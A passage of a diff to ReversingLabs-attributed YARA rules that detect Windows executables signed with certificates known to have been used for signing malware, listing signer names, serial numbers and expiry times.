+		logic_hash = "d1acb0a7d6e20158797e77c066be42548cee9293fa94f24f936a95977ac16d91"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21365,21 +43759,21 @@ rule REVERSINGLABS_Cert_Blocklist_B3391A6C1B3C6836533959E2384Ab4Ca : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VERIFIED SOFTWARE LLC" and ( pe.signatures [ i ] . serial == "00:b3:39:1a:6c:1b:3c:68:36:53:39:59:e2:38:4a:b4:ca" or pe.signatures [ i ] . serial == "b3:39:1a:6c:1b:3c:68:36:53:39:59:e2:38:4a:b4:ca" ) and 1595462400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Raymond Yanagita" and pe.signatures [ i ] . serial == "01:c8:8c:cb:d2:19:50:01:39:d1:af:13:8a:9e:89:8e" and 1593041280 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_05D50A0E09Bb9A836Ffb90A3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_41D05676E0D31908Be4Dead3486Aeae3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f2e0959f-3bc6-5552-8f7a-f84672fb597d"
+		id = "bca4533d-e721-5f23-984a-3b741ca8b53f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10644-L10660"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4628-L4644"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1bd1960cd6dd8bf83472dc2b1809b84ceb3db68a5e6c3ba68f28ad922230b2ed"
+		logic_hash = "c4905f02c74df6d05b3f9a6fe2c4f5f32a02bb10da4db929314be043be76d703"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21389,21 +43783,21 @@ rule REVERSINGLABS_Cert_Blocklist_05D50A0E09Bb9A836Ffb90A3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Toliz Info Tech Solutions INC." and pe.signatures [ i ] . serial == "05:d5:0a:0e:09:bb:9a:83:6f:fb:90:a3" and 1643892810 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rov SP Z O O" and pe.signatures [ i ] . serial == "41:d0:56:76:e0:d3:19:08:be:4d:ea:d3:48:6a:ea:e3" and 1594857600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A2787Fbb4627C91611573E323584113 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_8Cff807Edaf368A60E4106906D8Df319 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "64848927-6a60-5ea9-bae5-7d15c3f35ca6"
+		id = "c964a540-6124-52f0-b17f-692cd4b9b3af"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10662-L10678"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4646-L4664"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "efa352beafb56b95a89554bc8929f8e01a4da46eef1f6cf8a1487a2a06bc1b3e"
+		logic_hash = "6fc98519faf218d90bb4e01821e6014e009c0b525cfd3c906a64ef82bc20beda"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21413,21 +43807,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A2787Fbb4627C91611573E323584113 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "exxon.com" and pe.signatures [ i ] . serial == "0a:27:87:fb:b4:62:7c:91:61:15:73:e3:23:58:41:13" and 1640822400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KRAFT BOKS OOO" and ( pe.signatures [ i ] . serial == "00:8c:ff:80:7e:da:f3:68:a6:0e:41:06:90:6d:8d:f3:19" or pe.signatures [ i ] . serial == "8c:ff:80:7e:da:f3:68:a6:0e:41:06:90:6d:8d:f3:19" ) and 1598334455 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1D36C4F439D651503589318F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A3E62Be1572293Ad618F58A8Aa32857F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f72b8e2c-b799-5aec-a69a-e42cdb3e2ae1"
+		id = "2f67abf3-390a-5c67-afed-e586e20692af"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10680-L10696"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4666-L4684"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "73dc3c01041d50100a8d5519afe1a80f470c30175f9ad1bf76ac287ac199a959"
+		logic_hash = "f849898465bc651f19f6f1b54315c061466d8c5860ecf1a07f54c8c8292f6a95"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21437,21 +43831,21 @@ rule REVERSINGLABS_Cert_Blocklist_1D36C4F439D651503589318F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REDWOOD MARKETING SOLUTIONS INC." and pe.signatures [ i ] . serial == "1d:36:c4:f4:39:d6:51:50:35:89:31:8f" and 1651518469 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ISIDA, TOV" and ( pe.signatures [ i ] . serial == "00:a3:e6:2b:e1:57:22:93:ad:61:8f:58:a8:aa:32:85:7f" or pe.signatures [ i ] . serial == "a3:e6:2b:e1:57:22:93:ad:61:8f:58:a8:aa:32:85:7f" ) and 1596585600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_26F855A25890B749578F13E4B9459768 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_672D4428450Afcc24Fc60969A5063A3E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d873b0d4-dff5-5ee2-a70f-b067602b217e"
+		id = "fcd8e808-dbd6-5903-868a-0aa4541e6321"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10698-L10714"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4686-L4702"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "35bfa39ef8f03d10af884f288278ea6ad3aff31cbae111057c2b619c6dc0a752"
+		logic_hash = "8f5927e96109184bad7de4513994fd1021fe1cc5977e60fa72d808df95cb4516"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21461,21 +43855,21 @@ rule REVERSINGLABS_Cert_Blocklist_26F855A25890B749578F13E4B9459768 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Boo\\xE2\\x80\\x99s Q & Sweets Corporation" and pe.signatures [ i ] . serial == "26:f8:55:a2:58:90:b7:49:57:8f:13:e4:b9:45:97:68" and 1645401600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEP, OOO" and pe.signatures [ i ] . serial == "67:2d:44:28:45:0a:fc:c2:4f:c6:09:69:a5:06:3a:3e" and 1597381260 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0F1Ae2239Bb96C5Aef49D0Ae50266912 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Df479E14A70C7970A4De3Dd3E4Bb0318 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "44c878ab-75b2-5cd3-a019-94982a508e0f"
+		id = "465fc41c-920d-55e6-8616-a51d1f77b158"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10716-L10732"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4704-L4722"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4f88df4fc2f4cd89aa177ce09caab3e2660267ae883f7ab54c22a9ba1657bad0"
+		logic_hash = "35b1f04cf5d5d1d89db537bf75737e3af5945e594f4d4231e9ae3e7fba52fc0d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21485,21 +43879,21 @@ rule REVERSINGLABS_Cert_Blocklist_0F1Ae2239Bb96C5Aef49D0Ae50266912 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aarav Consulting Inc." and pe.signatures [ i ] . serial == "0f:1a:e2:23:9b:b9:6c:5a:ef:49:d0:ae:50:26:69:12" and 1653004800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SOFTWARE HUB IT LTD" and ( pe.signatures [ i ] . serial == "00:df:47:9e:14:a7:0c:79:70:a4:de:3d:d3:e4:bb:03:18" or pe.signatures [ i ] . serial == "df:47:9e:14:a7:0c:79:70:a4:de:3d:d3:e4:bb:03:18" ) and 1591660800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Deea179F5757Fe529043577762419Df : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2924785Fd7990B2D510675176Dae2Bed : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ef29c813-e914-5766-990f-76c14d18ec79"
+		id = "6898e95c-ee31-57a3-b764-99bf9008d0fe"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10734-L10750"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4724-L4740"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "67c3d3496caf54ca0b1afc4d1dcc902e2f3632ac6708f85e163d427b567d098f"
+		logic_hash = "e308ca5f24ed5811e947289caf9aa820a16b08ea183c7aa9826f8a726fb5c3cf"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21509,21 +43903,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Deea179F5757Fe529043577762419Df : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPIRIT CONSULTING s. r. o." and pe.signatures [ i ] . serial == "1d:ee:a1:79:f5:75:7f:e5:29:04:35:77:76:24:19:df" and 1645401600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Neoopt LLC" and pe.signatures [ i ] . serial == "29:24:78:5f:d7:99:0b:2d:51:06:75:17:6d:ae:2b:ed" and 1595000258 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5B1F9Ec88D185631Ab032Dbfd5166C0D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_F4D2Def53Bccb0Dd2B7D54E4853A2Fc5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "51c596cd-3033-51ef-914f-310d2bbfbd5f"
+		id = "3c1bec34-9eac-5c7c-bb36-2e24b6ee52dc"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10752-L10768"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4742-L4760"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "dec9d43c6911deb5f35c45692bfd6ef47f85d955f5e59041e58a1f0d2fc306e3"
+		logic_hash = "9991f44b8e984bd79269c44999481258d94bec9c21b154b63c6c30ae52344b3c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21533,21 +43927,21 @@ rule REVERSINGLABS_Cert_Blocklist_5B1F9Ec88D185631Ab032Dbfd5166C0D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOPFLIGHT GROUP LIMITED" and pe.signatures [ i ] . serial == "5b:1f:9e:c8:8d:18:56:31:ab:03:2d:bf:d5:16:6c:0d" and 1656028800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PETROYL GROUP, TOV" and ( pe.signatures [ i ] . serial == "00:f4:d2:de:f5:3b:cc:b0:dd:2b:7d:54:e4:85:3a:2f:c5" or pe.signatures [ i ] . serial == "f4:d2:de:f5:3b:cc:b0:dd:2b:7d:54:e4:85:3a:2f:c5" ) and 1598347687 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_58Af00Ce542760Fc116B41Fa92E18589 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_03Bf9Ef4Cf037A2385649026C3Da9D3E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bb58ae8d-ef28-5644-abe8-2d4d8c892e95"
+		id = "d7396af1-2eae-594a-9933-3d148503c0ea"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10770-L10786"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4762-L4778"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0ff773d252e5e0402171ae15d7ab43bcfd313eb8c326ed5f128a89ec43386a52"
+		logic_hash = "14196bad586b1349e6e8a1eb5621ce0d8d346ff8021c8ef80804de1533fd40d9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21557,21 +43951,21 @@ rule REVERSINGLABS_Cert_Blocklist_58Af00Ce542760Fc116B41Fa92E18589 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DICKIE MUSDALE WINDFARM LIMITED" and pe.signatures [ i ] . serial == "58:af:00:ce:54:27:60:fc:11:6b:41:fa:92:e1:85:89" and 1654819200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "COLLECTIVE SOFTWARE INC." and pe.signatures [ i ] . serial == "03:bf:9e:f4:cf:03:7a:23:85:64:90:26:c3:da:9d:3e" and 1595371955 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_25Ba18A267D6D8E08Ebc6E2457D58D1E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_790177A54209D55560A55Db97C5900D6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "eb06576e-11ea-58ba-aa19-68c161f6aa68"
+		id = "cc49f477-269a-55af-8344-39d2f24c1e7f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10788-L10804"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4780-L4796"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "174fe170c26a8197486e7b390d9fce4da61fb68ee5dc9486d43dbeb3cf659c3a"
+		logic_hash = "07c8e21fe604b481beebae784eb49e32bebee70e749581a55313bfbc757752e2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21581,21 +43975,21 @@ rule REVERSINGLABS_Cert_Blocklist_25Ba18A267D6D8E08Ebc6E2457D58D1E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5Y TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "25:ba:18:a2:67:d6:d8:e0:8e:bc:6e:24:57:d5:8d:1e" and 1648684800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MAK GmbH" and pe.signatures [ i ] . serial == "79:01:77:a5:42:09:d5:55:60:a5:5d:b9:7c:59:00:d6" and 1594080000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_12Df5Ff3460979Cec1288D874A9Fbf83 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_048F7B5F67D8E2B3030F75Eb7Be2713D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9158c9a5-37fc-54bc-9601-3aa347a421ab"
+		id = "e746516a-c51f-5cb8-8157-a5fe1f2c7abe"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10806-L10822"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4798-L4814"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3d4b5e56962d04bc35451eeab4c1870c8653c9afcbb28dc6bad7cfb1711e9df1"
+		logic_hash = "6d1b47f3c9d7b90a5470f83a848adeebff2cf9341a1eb41ca8b45d08b469b17f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21605,21 +43999,21 @@ rule REVERSINGLABS_Cert_Blocklist_12Df5Ff3460979Cec1288D874A9Fbf83 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORWARD MUSIC AGENCY SRL" and pe.signatures [ i ] . serial == "12:df:5f:f3:46:09:79:ce:c1:28:8d:87:4a:9f:bf:83" and 1599091200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RITEIL SERVIS, OOO" and pe.signatures [ i ] . serial == "04:8f:7b:5f:67:d8:e2:b3:03:0f:75:eb:7b:e2:71:3d" and 1591142400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Df2547B2Cab5689A81D61De80Eaaa3A2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_082023879112289Bf351D297Cc8Efcfc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1e76a088-b0f2-54d6-b730-77552c74d7bd"
+		id = "94a4e3d6-2d0a-5e5d-9ae8-574ef9be017e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10824-L10842"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4816-L4832"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cde89ae5b77ff6833fe642bdd74e81763ef068e31c07e7881906e4e4a5939942"
+		logic_hash = "58bec160445765ce45a26bf9d96ba6cfe61eee31e0953009d40a7ec64920c677"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21629,21 +44023,21 @@ rule REVERSINGLABS_Cert_Blocklist_Df2547B2Cab5689A81D61De80Eaaa3A2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORWARD MUSIC AGENCY SRL" and ( pe.signatures [ i ] . serial == "00:df:25:47:b2:ca:b5:68:9a:81:d6:1d:e8:0e:aa:a3:a2" or pe.signatures [ i ] . serial == "df:25:47:b2:ca:b5:68:9a:81:d6:1d:e8:0e:aa:a3:a2" ) and 1657756800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STA-R TOV" and pe.signatures [ i ] . serial == "08:20:23:87:91:12:28:9b:f3:51:d2:97:cc:8e:fc:fc" and 1573430400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_28B691272719B1Ee : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0D53690631Dd186C56Be9026Eb931Ae2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8f1d125a-de0f-525b-8dac-702bc123cc53"
+		id = "4f60613c-4162-5b3d-989f-f79a06450f4d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10844-L10860"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4834-L4850"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0bd973f415b7cfa0858c705c4486da9f181c7259af01d1cff486fb6b8e8e775b"
+		logic_hash = "3d0a80c062800f935fa3837755e8a91245e01a4e2450a05fecab5564cb62c15c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21653,21 +44047,21 @@ rule REVERSINGLABS_Cert_Blocklist_28B691272719B1Ee : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2021945 Ontario Inc." and pe.signatures [ i ] . serial == "28:b6:91:27:27:19:b1:ee" and 1616410532 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STA-R TOV" and pe.signatures [ i ] . serial == "0d:53:69:06:31:dd:18:6c:56:be:90:26:eb:93:1a:e2" and 1592190240 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1C897216E58E83Cbe74Ad03284E1Fb82 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_32119925A6Ce4710Aecc4006C28E749F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8805805d-312d-5bd4-94da-c18270ac26bf"
+		id = "cfd51cb8-bd04-5ede-a73e-e924815a01f0"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10862-L10878"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4852-L4868"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6b3b2708d3a442fa6425e60ae900c94fc22fbfdb47f290ff56e9d349d99fd85f"
+		logic_hash = "ca812cdfbb7ca984fae1e16159eb0eeb1e65767fcc6aa07eeb84966853146f9d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21677,21 +44071,21 @@ rule REVERSINGLABS_Cert_Blocklist_1C897216E58E83Cbe74Ad03284E1Fb82 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "M-Trans Maciej Caban" and pe.signatures [ i ] . serial == "1c:89:72:16:e5:8e:83:cb:e7:4a:d0:32:84:e1:fb:82" and 1639119705 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maxiol" and pe.signatures [ i ] . serial == "32:11:99:25:a6:ce:47:10:ae:cc:40:06:c2:8e:74:9f" and 1592438400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5A364C4957D93406F76321C2316F42F0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2C90Eaf4De3Afc03Ba924C719435C2A3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "49e36ae5-25f0-5e1d-82f0-c7ada2b4d914"
+		id = "06edc1a3-65b1-5a69-ab6b-4ffc3963513c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10880-L10896"
